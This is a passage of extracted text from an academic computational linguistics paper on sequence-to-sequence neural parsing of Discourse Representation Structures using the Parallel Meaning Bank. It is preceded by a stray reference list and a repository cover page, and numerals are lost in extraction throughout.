gideon s. mann and andrew mccallum. . generalized expectation criteria for semi- supervised learning with weakly labeled data. journal of machine learning research, : – . andrey andreevich markov. . the theory of algorithms. american mathematical society translations, series ( ): – . ilia markov, vivi nastase, and carlo strappar- ava. . punctuation as native language in- terference. in proceedings of the th inter- national conference on computational linguis- tics (coling), pages – . tomas mikolov, kai chen, greg corrado, and jef- frey dean. . efficient estimation of word representations in vector space. computing re- search repository (corr), arxiv: . . mark-jan nederhof and giorgio satta. . probabilistic parsing as intersection. in th in- ternational workshop on parsing technologies (iwpt), pages – . hwee tou ng, siew mei wu, ted briscoe, chris- tian hadiwinoto, raymond hendy susanto, and christopher bryant. . the conll- shared task on grammatical error correction. in proceedings of the eighteenth conference on computational natural language learning: shared task, pages – . joakim nivre, Željko agić, lars ahrenberg, maria jesus aranzabe, masayuki asahara, aitziber atutxa, miguel ballesteros, john bauer, kepa bengoetxea, yevgeni berzak, riyaz ahmad bhat, eckhard bick, carl börstell, cristina bosco, gosse bouma, sam bowman, gülşen cebiroğlu eryiğit, giuseppe g. a. celano, fabricio chalub, Çağrı Çöl- tekin, miriam connor, elizabeth davidson, marie-catherine de marneffe, arantza diaz de ilarraza, kaja dobrovoljc, timothy dozat, kira droganova, puneet dwivedi, marhaba eli, tomaž erjavec, richárd farkas, jennifer foster, claudia freitas, katarína gajdošová, daniel galbraith, marcos garcia, moa gär- denfors, sebastian garza, filip ginter, iakes goenaga, koldo gojenola, memduh gökır- mak, yoav goldberg, xavier gómez guino- vart, berta gonzáles saavedra, matias gri- oni, normunds grūzı̄tis, bruno guillaume, jan hajič, linh hà mỹ, dag haug, barbora hladká, radu ion, elena irimia, anders jo- hannsen, fredrik jørgensen, hüner kaşıkara, hiroshi kanayama, jenna kanerva, boris katz, jessica kenney, natalia kotsyba, si- mon krek, veronika laippala, lucia lam, phuong lê hồng, alessandro lenci, nikola ljubešić, olga lyashevskaya, teresa lynn, aibek makazhanov, christopher manning, cătălina mărănduc, david mareček, héctor martínez alonso, andré martins, jan mašek, yuji matsumoto, ryan mcdonald, anna mis- silä, verginica mititelu, yusuke miyao, simon- etta montemagni, keiko sophie mori, shun- suke mori, bohdan moskalevskyi, kadri muis- downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/i - http://www.aclweb.org/anthology/i - http://www.aclweb.org/anthology/i - http://cs.jhu.edu/~jason/papers/#li-eisner- http://cs.jhu.edu/~jason/papers/#li-eisner- http://cs.jhu.edu/~jason/papers/#li-eisner- http://cs.jhu.edu/~jason/papers/#li-eisner- http://www.aclweb.org/anthology/u - http://www.aclweb.org/anthology/u - http://www.aclweb.org/anthology/u - https://doi.org/ . /v /p - https://doi.org/ . /v /p - https://doi.org/ . /v /p - http://www.jmlr.org/papers/volume /mann a/mann a.pdf http://www.jmlr.org/papers/volume /mann a/mann a.pdf http://www.jmlr.org/papers/volume /mann a/mann a.pdf http://www.aclweb.org/anthology/c - http://www.aclweb.org/anthology/c - http://arxiv.org/abs/ . http://arxiv.org/abs/ . https://doi.org/ . /v /w - https://doi.org/ . /v /w - chnek, nina mustafina, kaili müürisep, luong nguyễn thi., huyền nguyễn thi. minh, vitaly nikolaev, hanna nurmi, petya osenova, robert Östling, lilja Øvrelid, valeria paiva, elena pas- cual, marco passarotti, cenel-augusto perez, slav petrov, jussi piitulainen, barbara plank, martin popel, lauma pretkalnin, a, prokopis prokopidis, tiina puolakainen, sampo pyysalo, alexandre rademaker, loganathan ramasamy, livy real, laura rituma, rudolf rosa, shadi saleh, baiba saulı̄te, sebastian schuster, wolf- gang seeker, mojgan seraji, lena shakurova, mo shen, natalia silveira, maria simi, radu simionescu, katalin simkó, mária Šimková, kiril simov, aaron smith, carolyn spadine, alane suhr, umut sulubacak, zsolt szántó, takaaki tanaka, reut tsarfaty, francis ty- ers, sumire uematsu, larraitz uria, gertjan van noord, viktor varga, veronika vincze, lars wallin, jing xian wang, jonathan north washington, mats wirén, zdeněk Žabokrt- ský, amir zeldes, daniel zeman, and hanzhi zhu. . universal dependencies . . lindat/clarin digital library at the in- stitute of formal and applied linguistics (Úfal), faculty of mathematics and physics, charles university. data available at http: //universaldependencies.org. joakim nivre, johan hall, sandra kübler, ryan mcdonald, jens nilsson, sebastian riedel, and deniz yuret. a. the conll shared task on dependency parsing. in proceedings of the conll shared task session of emnlp- conll , pages – . joakim nivre, johan hall, jens nilsson, atanas chanev, gülşen eryigit, sandra kübler, sve- toslav marinov, and erwin marsi. b. malt- parser: a language-independent system for data-driven dependency parsing. natural lan- guage engineering, ( ): – . joakim nivre et al. . universal depen- dencies annotation guidelines. available at universaldependencies.org. geoffrey nunberg. . the linguistics of punc- tuation. number in csli lecture notes. center for the study of language and informa- tion. bo pang, lillian lee, and shivakumar vaithyanathan. . thumbs up? senti- ment classification using machine learning techniques. in proceedings of the conference on empirical methods in natural language processing (emnlp ). jeffrey pennington, richard socher, and christo- pher manning. . glove: global vectors for word representation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pages – . fernando c. n. pereira and michael d. riley. . speech recognition by composition of weighted finite automata. computing research repository (corr), arxiv:cmp-lg/ . mohammad sadegh rasooli and joel r. tetreault. . yara parser: a fast and accurate depen- dency parser. computing research repository, arxiv: . (version ). radim řehůřek and petr sojka. . software framework for topic modelling with large cor- pora. in proceedings of the lrec work- shop on new challenges for nlp frameworks, pages – . valentin i. spitkovsky, hiyan alshawi, and daniel jurafsky. . punctuation: making a point in unsupervised dependency parsing. in proceed- ings of the fifteenth conference on computa- tional natural language learning, conll ’ , pages – . kai sheng tai, richard socher, and christo- pher d. manning. . improved semantic representations from tree-structured long short- term memory networks. in proceedings of the rd annual meeting of the association for computational linguistics and the th interna- tional joint conference on natural language processing (acl-coling), pages – . ottokar tilk and tanel alumäe. . bidirec- tional recurrent neural network with attention mechanism for punctuation restoration. in in- terspeech, pages – . ke m. tran, yonatan bisk, ashish vaswani, daniel marcu, and kevin knight. . unsu- pervised neural hidden markov models. in pro- ceedings of the workshop on structured predic- tion for nlp, pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://hdl.handle.net/ / - http://universaldependencies.org http://universaldependencies.org http://www.aclweb.org/anthology/d/d /d - http://www.aclweb.org/anthology/d/d /d - http://universaldependencies.org/guidelines.html http://universaldependencies.org/guidelines.html universaldependencies.org http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - https://doi.org/ . /v /d - https://doi.org/ . /v /d - https://arxiv.org/abs/cmp-lg/ https://arxiv.org/abs/cmp-lg/ http://arxiv.org/abs/ . http://arxiv.org/abs/ . http://is.muni.cz/publication/ /en http://is.muni.cz/publication/ /en http://is.muni.cz/publication/ /en http://dl.acm.org/citation.cfm?id= . http://dl.acm.org/citation.cfm?id= . https://doi.org/ . /v /p - https://doi.org/ . /v /p - https://doi.org/ . /v /p - https://doi.org/ . /v /w - https://doi.org/ . /v /w - university of chicago. . the chicago man- ual of style. university of chicago press. dingquan wang and jason eisner. . the galactic dependencies treebanks: getting more data by synthesizing new languages. transac- tions of the association for computational lin- guistics (tacl), : – . michael white and rajakrishnan rajkumar. . a more precise analysis of punctuation for broad-coverage surface realization with ccg. in proceedings of the coling workshop on grammar engineering across frameworks, pages – . k. xu, l. xie, and k. yao. . investigat- ing lstm for punctuation prediction. in th international symposium on chinese spo- ken language processing (iscslp), pages – . richard zens, franz josef och, and hermann ney. . phrase-based statistical machine transla- tion. in annual conference on artificial intelli- gence, pages – . dongdong zhang, shuangzhi wu, nan yang, and mu li. . punctuation prediction with transition-based parsing. in proceedings of the st annual meeting of the association for computational linguistics (acl), pages – . yue zhang and joakim nivre. . transition- based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the association for computational linguistics: human language technologies (naacl-hlt), pages – . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april http://cs.jhu.edu/~jason/papers/#wang-eisner- http://cs.jhu.edu/~jason/papers/#wang-eisner- http://cs.jhu.edu/~jason/papers/#wang-eisner- http://www.aclweb.org/anthology/w - http://www.aclweb.org/anthology/w - https://doi.org/ . /iscslp. . https://doi.org/ . /iscslp. . https://link.springer.com/chapter/ . / - - - _ https://link.springer.com/chapter/ . / - - - _ http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - university of groningen exploring neural methods for parsing discourse representation structures van noord, rik; abzianidze, lasha; toral ruiz, antonio; bos, johannes published in: transactions of the association for computational linguistics doi: . /tacl_a_ important note: you are advised to consult the publisher's version (publisher's pdf) if you wish to cite from it. please check the document version below. document version publisher's pdf, also known as version of record publication date: link to publication in university of groningen/umcg research database citation for published version (apa): van noord, r., abzianidze, l., toral ruiz, a., & bos, j. ( ). exploring neural methods for parsing discourse representation structures. transactions of the association for computational linguistics, , - . https://doi.org/ . /tacl_a_ copyright other than for strictly personal use, it is not permitted to download or to forward/distribute the text or part of it without the consent of the author(s) and/or copyright holder(s), unless the work is under an open content license (like creative commons). take-down policy if you believe that this document breaches copyright please contact us providing details, and we will remove access to the work immediately and investigate your claim. downloaded from the university of groningen/umcg research database (pure): http://www.rug.nl/research/portal. for technical reasons the number of authors shown on this cover page is limited to maximum. download date: - - https://doi.org/ . /tacl_a_ https://research.rug.nl/en/publications/exploring-neural-methods-for-parsing-discourse-representation-structures( abd fff-f b- ff-bd e-a dc acc ).html https://doi.org/ . /tacl_a_ exploring neural methods for parsing discourse representation structures rik van noord lasha abzianidze antonio toral johan bos center for language and cognition, university of groningen {r.i.k.van.noord, l.abzianidze, a.toral.ruiz, johan.bos}@rug.nl abstract neural methods have had several recent successes in semantic parsing, though they have yet to face the challenge of pro- ducing meaning representations based on formal semantics. we present a sequence- to-sequence neural semantic parser that is able to produce discourse representation structures (drss) for english sentences with high accuracy, outperforming tradi- tional drs parsers. to facilitate the learn- ing of the output, we represent drss as a sequence of flat clauses and introduce a method to verify that produced drss are well-formed and interpretable. we compare models using characters and words as in- put and see (somewhat surprisingly) that the former performs better than the latter. we show that eliminating variable names from the output using de bruijn indices increases parser performance. adding silver training data boosts performance even further. introduction semantic parsing is the task of mapping a natu- ral language expression to an interpretable mean- ing representation. semantic parsing used to be the domain of symbolic and statistical approaches (pereira and shieber, ; zelle and mooney, ; blackburn and bos, ). recently, how- ever, neural methods, and in particular sequence- to-sequence models, have been successfully applied to a wide range of semantic parsing tasks. these include code generation (ling et al., ), question answering (dong and lapata, ; he and golub, ) and abstract meaning repre- sentation parsing (konstas et al., ). because these models have no intrinsic knowledge of the structure (tree, graph, set) they have to produce, recent work also focused on structured decod- ing methods, creating neural architectures that always output a graph or a tree (alvarez-melis and jaakkola, ; buys and blunsom, ). these methods often outperform the more general sequence-to-sequence models but are tailored to specific meaning representations. this paper will focus on parsing discourse representation structures (drss) proposed in discourse representation theory (drt), a well- studied formalism developed in formal semantics (kamp, ; van der sandt, ; asher, ; kamp and reyle, ; muskens, ; van eijck and kamp ; kadmon, ; asher and las-carides, ), dealing with many semantic phenomena: quantifiers, negation, scope ambi- guities, pronouns, presuppositions, and discourse structure (see figure ). drss are recursive struc- tures and thus form a challenge for sequence-to- sequence models because they need to generate a well-formed structure and not something that looks like one but is not interpretable. the problem that we try to tackle bears similarities to the recently introduced task of map- ping sentences to an abstract meaning represen- tation (amr; banarescu et al. ). but there are notable differences between drs and amr. firstly, drss contain scope, which results in a more linguistically motivated treatment of modals, quantification, and negation. secondly, drss con- tain a substantially higher number of variable bindings (reentrant nodes in amr terminol- ogy), which are challenging for learning (damonte et al., ). drs parsing was attempted in the s for small fragments of english (johnson and klein, ; wada and asher, ). wide-coverage transactions of the association for computational linguistics, vol. , pp. – , . action editor: asli celikyilmaz. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. raw input: tom isn’t afraid of anything. system output of a drs in a clausal form: b ref x b ref s b male "n. " x b time s t b name x "tom" b experiencer s x b ref t b afraid "a. " s b equ t "now" b stimulus s x b time "n. " t b ref x b not b b entity "n. " x the same drs in a box format: b ¬ s x b afraid.a. (s ) time(s , t ) stimulus(s ,x ) experiencer(s ,x ) entity.n. (x ) x b male.n. (x ) name(x , tom) t b time.n. (t ) t = now figure : drs parsing in a nutshell. given a raw text, a system has to generate a drs in the clause format, a flat version of the standard box notation. the semantic representation formats are made more readable by using various letters for variables: the letters x, e, s, and t are used for discourse referents denoting individuals, events, states, and time, respectively, and b is used for variables denoting drs boxes. drs parsers based on supervised machine learn- ing emerged later (bos, b; le and zuidema, ; bos, ; liu et al., ). the objectives of this paper are to apply neural methods to drs parsing. in particular, we are interested in answers to the following research questions (rqs): . are sequence-to-sequence models able to produce formal meaning representations (drss)? . what is better for input: sequences of charac- ters or sequences of words; does tokenization help; and what kind of casing is best used? . what is the best way of dealing with variables that occur in drss? . does adding silver data increase the perfor- mance of the neural parser? . what parts of semantics are learned and what parts of semantics are still challenging? we make the following contributions to seman- tic parsing: (a) the output of our parser consists of interpretable scoped meaning representations, the code is available here: https://github.com/ rikvn/neural_drs. guaranteed by a specially designed checking tool (§ ). (b) we compare different methods of repre- senting input and output in § . (c) we show in § that using additional, non-gold standard data can improve performance. (d) we per- form a thorough analysis of the produced out- put and compare our methods with symbolic/ statistical approaches (§ ). discourse representation structures . the structure of drs drss are meaning representations introduced by drt (kamp and reyle, ). in general, a drs can be seen as an ordered pair 〈a, l :b〉, where a is a set of presuppositional drss, and b a drs with a label l. the presuppositional drss a can be viewed as propositions that need to be anchored in the context in order to make the main drs b true, where presuppositions comprise anaphoric phenomena, too (van der sandt, ; geurts, ; beaver, ). drss are either elementary drss or segmented drss. an elementary drs is an ordered pair of a set of discourse referents and a set of con- ditions. there are basic conditions and complex conditions. a basic condition is a predicate ap- plied to constants or discourse referents, whereas a complex condition can introduce boolean oper- ators ranging over drss (negation, conditionals, disjunction). segmented drss capture discourse structure by connecting two units of discourse by a discourse relation (asher and lascarides, ). . annotated corpora despite a long tradition of formal interest in drt, it is only recently that textual corpora annotated with drss have been made available. the gronin- gen meaning bank (gmb) is a large corpus with drs annotation for mostly short english news- paper texts (basile et al., ; bos et al., ). the drss in this corpus are produced by an existing semantic parser and then partially corrected. the drss in the gmb are therefore not gold standard. a similar corpus is the parallel meaning bank (pmb), which provides drss for english, german, dutch, and italian sentences based on a parallel corpus (abzianidze et al., ). the pmb, too, is constructed using an existing seman- tic parser, but a part of it is completely manually checked and corrected (i.e., gold standard). in con- trast to the gmb, the pmb involves two major https://github.com/rikvn/neural_drs https://github.com/rikvn/neural_drs additions: (a) its semantics are refined by mod- eling tense and using semantic tagging (bjerva et al., ; abzianidze and bos, ), and (b) the non-logical symbols of the drss correspond- ing to concepts and semantic roles are grounded in wordnet (fellbaum, ) and verbnet (bonial et al., ), respectively. these additions make the drss of the pmb more fine-grained meaning representations. for this reason we choose the pmb (over the gmb) as our corpus for evaluating our semantic parser. even though the sentences in the current release of the pmb are relatively short, they contain many difficult semantic phenomena that a seman- tic parser has to deal with: pronoun resolution, quantifiers, scope of modals and negation, multi- word expressions, word senses, semantic roles, presupposition, tense, and discourse relations. as far as we know, we are the first group to use the pmb corpus for semantic parsing. . formatting drss with boxes and clauses the usual way to represent drss is the well- known box format. to facilitate reading a drs with unresolved presuppositions, it can be de- picted as a network of boxes, where a non- presuppositional (i.e., main) drs l : b is connected to the presuppositional drss a with ar- rows. each box comes with a unique label and has two rows. in the case of elementary drss, these rows contain discourse referents in the top row and conditions in the bottom row (figure ). a seg- mented drs has a row with labeled drss and a row with discourse relations (figure ). the drs in figure consists of a main box b and two presuppositional boxes, b and b . note that b has no discourse referents but introduces negation via a single condition ¬b with a nested box b . the conditions of b represent unary and binary relations over discourse referents that are introduced either by b or the presuppositional drss. a clausal form is another way of formatting drss. it represents a drs as a set of clauses (see figures and ). this format is better suited for machine learning than the box format, as it has a simple, flat structure and facilitates partial matching of drss, which is useful for evaluation (van noord et al., ). conversion from the box notation to the clausal form and vice versa is trans- parent: discourse referents, conditions, and dis- figure : a segmented drs. discourse relations are formatted with uppercase characters. course relations in the clausal form are preceded by the label of the box in which they occur. notice that the variable letters in the semantic representa- tions are automatically set and they simply serve for readability purposes. throughout the experi- ments described in this paper, we utilize clausal form drss. method . annotated data we use the english drss from release . . of the pmb (abzianidze et al., ). the release sug- gests using the parts , , , and as the de- velopment set, resulting in , training and development instances. basic statistics are shown in table , and the number of occurrences of some of the semantic phenomena mentioned in § . are given in table . because this is a rather small training set, we tune our model using -fold cross-validation (cv) on the training set, rather than tuning on a separate development set. this means that we will use the suggested development set as a test set (and refer to it as such). when testing on this set, we train a model on all available training data. the utilized pmb release also comes with “silver” data—namely, , drss that are only partially http://pmb.let.rug.nl/data.php. http://pmb.let.rug.nl/data.php sentences tokens avg tok/sent gold train , , . gold test , . silver , , . table : number of documents, sentences, and to- kens for the english part of pmb release . . . note that the number of tokens is based on the pmb tokenization, treating multiword expressions as a single token. phenomenon train test silver negation & modals , scope ambiguity ≈ ≈ , pronoun resolution ≈ ≈ , discourse rel. & imp. , embedded clauses ≈ ≈ , table : counts of relevant semantic phenomena for pmb release . . . these phenomena are described and further discussed in § . . manually corrected. in addition, we use the drss from the silver data but without the manual cor- rections, which makes them “bronze” drss (fol- lowing pmb terminology). our experiments will initially use only the gold standard data, after which we will use the silver or bronze data to fur- ther push the score of our best systems. . clausal form checker the clausal form of a drs needs to satisfy a set of constraints in order to correspond to a semanti- cally interpretable drs, that is, translatable into a first-order logic formula without free occurrences of a variable (kamp and reyle, ). for ex- ample, all discourse referents need to be explicitly introduced with a ref clause to avoid free occur- rences of variables. we implemented a clausal form checker that validates the clausal form if and only if it rep- resents a semantically interpretable drs. distin- guishing box variables from entity variables is crucial for the validity checking, but automatically learned clausal forms are not expected to differen- tiate variable types. first, the checker separately the phenomena are automatically counted based on clausal forms. the counting algorithm does not guarantee the exact number for certain phenomena, though it returned the exact counts of all the phenomena on the test data except the pronoun resolution ( ). parses each clause in the form to induce variable types based on the fixed set of comparison and drs operators. after typing all the variables, the checker verifies whether the clauses collectively correspond to a drs with well-formed semantics. for each box variable in a discourse relation, ex- istence of the corresponding box inside the same segmented drs is checked. for each entity vari- able in a condition, an introduction of the binder (i.e., accessible) discourse variable is found. the goal of these two steps is to prevent free occur- rences of variables in drss. while binding the entity variables, necessary accessibility relations between the boxes are induced. in the end, the checker verifies the transitive closure of the in- duced accessibility relation on loops and checks existence of a unique main box of the drs. the checker is applied to every automatically obtained clausal form. if a clausal form fails the test, it is considered as ill-formed and will not have a single clause matched with the gold stan- dard when calculating the f-score. . evaluation a drs parser is evaluated by comparing its out- put drs to a gold standard drs using the counter tool (van noord et al., ). counter calculates an f-score over matching clauses. because variable names are meaningless, obtaining the matching clauses essentially is a search for the best variable mapping between two drss. counter tries to find this mapping by performing a hill-climbing search with a predefined number of restarts to avoid get- ting stuck in a local optimum, which is similar to the evaluation system smatch (cai and knight, ) for amr parsing. counter generalizes over wordnet synsets (i.e., a system is not penalized for predicting a word sense that is in the same synset as the gold standard word sense). to calculate whether there is a significant differ- ence between two systems, we perform approxi- mate randomization (noreen, ) with α = . , r = , , and f(model ) > f(model ) as test statistics for each individual drs pair. . neural architecture we use a recurrent sequence-to-sequence neu- ral network (henceforth seq seq) with two counter ignores ref clauses in the calculation of the f-score because they are usually redundant and therefore inflate the final score (van noord et al., ). tom is n't afraid of encoder decoder b ref x sep b ... x anything attention figure : the sequence-to-sequence model with word-representation input. sep is used as a spe- cial character to separate clauses in the output. bidirectional long short-term memory (lstm) layers and nodes, implemented in opennmt (klein et al., ). the network encodes a se- quence representation of the natural language ut- terance, while the decoder produces the sequences of the meaning representation. we apply dropout (srivastava et al., ) between both the recurrent encoding and decoding layers to prevent overfit- ting, and use general attention (luong et al., ) to selectively give more weight to certain parts of the input sentence. an overview of the gen- eral framework of the seq seq model is shown in figure . during decoding we perform beam search with length normalization, which in neural machine translation (nmt) is crucial to obtaining good re- sults (britz et al., ). we experimented with a wide range of parameter settings, of which the final settings can be found in table . we opted against trying to find the best parame- ter settings for each individual experiment (next to impossible in terms of computing time nec- essary, as a single -fold cv experiment takes hours on gpu), but selected parameter settings that showed good performance for both the initial character and word-level representations (see § for details). the parameter search was performed using -fold cv on the training set. training is stopped when there is no more improvement in perplexity on the validation set, which in our case occurred after – epochs. a powerful, well-known technique in the field of nmt is to use an ensemble of models during decoding (sutskever et al., ; sennrich et al., a). the resulting model averages over the pre- dictions of the individual models, which can bal- ance out some of the errors. in our experiments, we apply this method when decoding on the test set, but not for our experiments of -fold cv (this would take too much computation time). parameter value parameter value rnn-type lstm dropout . encoder-type brnn dropout type naive optimizer sgd bridge copy layers learning rate . nodes learning rate decay . min freq source max grad norm min freq target beam size vector size length normalization . table : parameters explored during training and testing with their final values. all other parameters have default values. experiments with data representations this section describes the experiments we con- duct regarding the data representations of the input (english sentences) and output (a drs) during training. . between characters and words we first try two (default) representations: character- level and word-level. most semantic parsers use word-level representations for the input, but as a result are often dependent on pre-trained word em- beddings or anonymization of the input to obtain good results. character-level models avoid this issue but might be at a higher risk of producing ill-formed output. character-based model in the character-level model, the input (an english sentence) is rep- resented as a sequence of individual characters. the output (a drs in clause format) is lin- earized, with special characters indicating spaces and clause separators. the semantic roles (e.g., agent, theme), drs operators (e.g., ref, not, pos), and deictic constants (e.g., "now", "speaker", "hearer") are not represented as character sequences, but treated as compound characters, meaning that ref is not treated as a sequence of r, e and f, but directly as ref. all proper names, wordnet senses, time/date expres- sions, and numerals are represented as character sequences. this is done to keep the vocabulary small. an exam- ple is to change all proper names to name in both the sentence and meaning representation during training. when producing output, the original names are restored by switch- ing name with a proper name found in the input sentence (konstas et al., ). word-based model in the word-level model, the input is represented as a sequence of words, using spaces as a separator (i.e., the original words are kept). the output is the same as for the character-based model, except that the char- acter sequences are represented as words. we use pre-trained glove embeddings (pennington et al., ) to initialize the encoder and decoder rep- resentations. in the drs representation, there are semantic roles and drs operators that might look like english words, but should not be interpreted as such (e.g. agent, not). these entities are re- moved from the set of pre-trained embeddings, so that the model will learn them from scratch (start- ing from a random initialization). hybrid representations: bpe we do not necessarily have to restrict ourselves to using only characters or words as input representa- tion. in nmt, byte-pair encoding (bpe; sennrich et al. b) is currently the de facto standard (bojar et al., ). this is a frequency-based method that automatically finds a representation that is between character-level and word-level. it starts out with the character-level format and then does a predefined number of merges of frequently co-occurring characters. tuning this number of merges determines whether the result- ing representation is closer to character-level or word-level. we explore a large range of merges ( k– k), while applying a corresponding set of pre-trained bpe embeddings (heinzerling and strube, ). however, none of the bpe exper- iments improved on the character-level or word- level score (f-scores between and ), only coming close when using a small number of merges (which is very close to character-level any- way). therefore this technique was disregarded for further experiments. combined char and word there is also a fourth possible representation of the input: con- catenating the character-level and word-level rep- resentations. this is uncommon in nmt because of the large size of the embedding space (hence their preference for bpe), but possible here since the pmb data contain relatively short sentences. we simply add the word embedding vector af- ter the sequence of character-embeddings for each the common crawl version trained on billion tokens, vector size . model prec rec f-score % ill char . . . . word . . . . char + word . . . . table : evaluating different input represen- tations. the percentage of ill-formed drss is denoted by % ill. word in the input and still initialize these embed- dings using the pre-trained glove embeddings. representation results the results of the ex- periments ( -fold cv) for finding the best representation are shown in table . character representations are clearly better than word rep- resentations, though the word-level representation produces fewer ill-formed drss. both represen- tations are maintained for our further experiments. although the combination of characters and words did lead to a small increase in performance over characters only (table ), this difference is not sig- nificant. hence, this representation is discarded in further experiments described in this paper. . tokenization an interesting aspect of the pmb data is the way the input sentences are tokenized. in the data set, multiword expressions are tokenized as sin- gle words, for example, “new york” is tokenized to “new∼york.” unfortunately, most off-the-shelf tokenizers (e.g., the moses tokenizer) are not equipped to deal with this. we experiment with using elephant (evang et al., ), a tokenizer that can be (re-)trained on individual data sets, us- ing the tokenized sentences of the published silver and gold pmb data set. simultaneously, we are interested in whether character-level models need tokenization at all, which would be a possible ad- vantage of this type of representing the input text. results of the experiment are shown in table . none of the two tokenization methods yielded a significant advantage for the character-level models, so they will not be used further. the word-level models, however, did benefit from to- kenization, but elephant did not give us an ad- vantage over the moses tokenizer. therefore, for gold tokenization is available in the data set, but using this would not reflect practical applications of drs parsing, as we want raw text as input for a realistic setting. b ref x b male "n. " x b name x "tom" b ref t b equ t "now" b time "n. " t b not b b ref s b time s t b experiencer s x b afraid "a. " s b stimulus s x b ref x b entity "n. " x (a) standard naming $ ref @ $ male "n. " @ $ name @ "tom" $ ref @ $ equ @ "now" $ time "n. " @ $ not $ $ ref @ $ time @ @ $ experiencer @ @ $ afraid "a. " @ $ stimulus @ @ $ ref @ $ entity "n. " @ (b) absolute naming [new] ref 〈new〉 [ ] male "n. " 〈 〉 [ ] name 〈 〉 "tom" [new] ref 〈new〉 [ ] equ 〈 〉 "now" [ ] time "n. " 〈 〉 [new] not [new] [ ] ref 〈new〉 [ ] time 〈 〉 〈- 〉 [ ] experiencer 〈 〉 〈- 〉 [ ] afraid "a. " 〈 〉 [ ] stimulus 〈 〉 〈 〉 [ ] ref 〈new〉 [ ] entity "n. " 〈 〉 (c) relative naming figure : different methods of variable naming exemplified on the clausal form of figure . for (c), positive numbers refer to introductions that have yet to occur, and negative numbers refer to known introductions. a zero refers to the previous introduction for that variable type. word-level models, we use moses in our subse- quent experiments. . representing variables so far we did not attempt to do anything special with the variables that occur in drss, as we sim- ply tried to learn them as supplied in the pmb data set. obviously, drss constitute a challenge for seq seq models because of the high number of multiple occurrences of the same variables, in par- ticular compared with amr. amr parsers do not deal well with this, because the reentrancy metric (damonte et al., ) is among the lowest met- rics for all amr parsers that reported them or are publicly available (van noord and bos, b). moreover, for amr, only % of the represen- tations contain at least one reentrant node, and only % of the triples in amr contain a reen- trant node (van noord and bos, a), but for drss these are both virtually %. although seq seq amr parsers could get away with ig- noring variables during training and reinstating them in a post-processing step, for drss this is unfeasible. however, because variable names are chosen arbitrarily, they will be hard for a seq seq model to learn. we will therefore experiment with two methods of rewriting the variables to a more gen- eral representation, distinguishing between box variables and discourse variables. our first method (absolute) traverses down the list of clauses, rewriting each new variable to a unique represen- tation, taking the order into account. the second char parser word parser f % ill f % ill baseline (bs) . . . . moses (mos) . . . . elephant (ele) . . . . bs/mos + absolute (abs) . . . . bs/mos + relative (rel) . . . . bs/mos + rel + lowercase . . . . bs/mos + rel + truecase . . . . bs/mos + rel + feature . . . . table : results of the -fold cv experiments re- garding tokenization, variable rewriting, and cas- ing; bs/mos means that we use no tokenization for the character-level parser, while we use moses for the word-level parser. method (relative) is more sophisticated; it rewrites variables based on when they were introduced, inspired by the de bruijn index (de bruijn, ). we view box variables as introduced when they are first mentioned, and we take the ref clause of a discourse referent as their introduction. the two rewriting methods are illustrated in figure . the results are shown in table . for both char- acters and words, the relative rewriting method significantly outperforms the absolute method and the baseline, though the absolute method pro- duces fewer ill-formed drss. interestingly, the character-level model still obtains a higher f - score compared to the word-level model, even though it produces more ill-formed drss. training instances f ­s co re char­level word­level figure : learning curve for different number of gold instances for both the character-level and word-level neural parsers ( -fold cv experiment for every instances). . casing casing is a writing device mostly used for punc- tuation purposes. on the one hand, it increases the set of characters (hence adding more redun- dant variation to the input). on the other hand, case can be a useful feature to recognize proper names because names of individuals are semanti- cally analysed as presuppositions. explicitly en- coding uppercase with a feature could therefore prevent us from including a named-entity recog- nizer, often used in other semantic parsers. al- though we do not expect dealing with case to be a major challenge, we try out different techniques to find an optimal balance between abstracting over input characters and parsing performance. the re- sults, in table , show that the feature works well for the character-level model, but for the word- level model, it does not outperform lowercasing. these settings are used in further experiments. experiments with additional data because semantic annotation is a difficult and time-consuming task, gold standard data sets are usually relatively small. this means that semantic parsers (and data-hungry neural methods in par- ticular) can often benefit from more training data. some examples in semantic parsing are data re- combination (jia and liang, ), paraphrasing (berant and liang, ), or exploiting machine- generated output (konstas et al., ). however, before we do any experiments using extra train- ing data, we want to be sure that we can still ben- char parser word parser data f % ill f % ill best gold-only . . . . + ensemble . . . . gold + silver . . . . + ensemble . . . . table : f -score and percentage of ill-formed drss on the test set, for the experiments with the pmb-released silver data. the scores without us- ing an ensemble are an average of five runs of the model. efit from more gold training data. for both the character level and word level we plot the learn- ing curve, adding training instances at a time, in figure . for both models the f-score clearly still improves when using more training instances, which shows that there is at least the potential for additional data to improve the score. for drss, the pmb- . . release already con- tains a large set of silver standard data ( , in- stances), containing drss that are only partially manually corrected. we then train a model on both the gold and silver standard data, making no distinction between them during training. after train- ing we take the last model and restart the train- ing on only the gold data, in a similar process as described in konstas et al. ( ) and van noord and bos ( b). in general, restarting the train- ing to fine-tune the weights of the model is a com- mon technique in nmt (denkowski and neubig, ). we are aware that there are many methods to obtain and utilize additional data. however, our main aim is not to find the optimal method for drs parsing, but to demonstrate that using additional data is indeed beneficial for neural drs parsing. because we are not further fine-tuning our model, we will show results on the test set in this section. table shows the results of adding the sil- ver data. this results in a large increase in per- formance, for both the character- and word-level models. we are still reliant on manually annotated data, however, because without the gold data (so training on only the silver data), we score even lower than our baseline model ( . and . for the char and word parser). similarly, we are reliant on the fine-tuning procedure, as we also score be- low our baseline models without it ( . and . for the char and word parsers, respectively). char parser word parser data f % ill f % ill silver (boxer-generated) . . . . bronze (boxer-generated) . . . . bronze (nn-generated) . . . . without ill-formed drss . . . . table : test set results of the experiments that analyze the impact of the silver data. we believe there are two possible factors that could explain why the addition of silver data re- sults in such a large improvement: (i) the fact that the data are silver instead of bronze or (ii) the fact that a different drs parser (boxer, see § ) is used to create the silver data instead of our own parser. we conduct an experiment to identify the impact on performance of 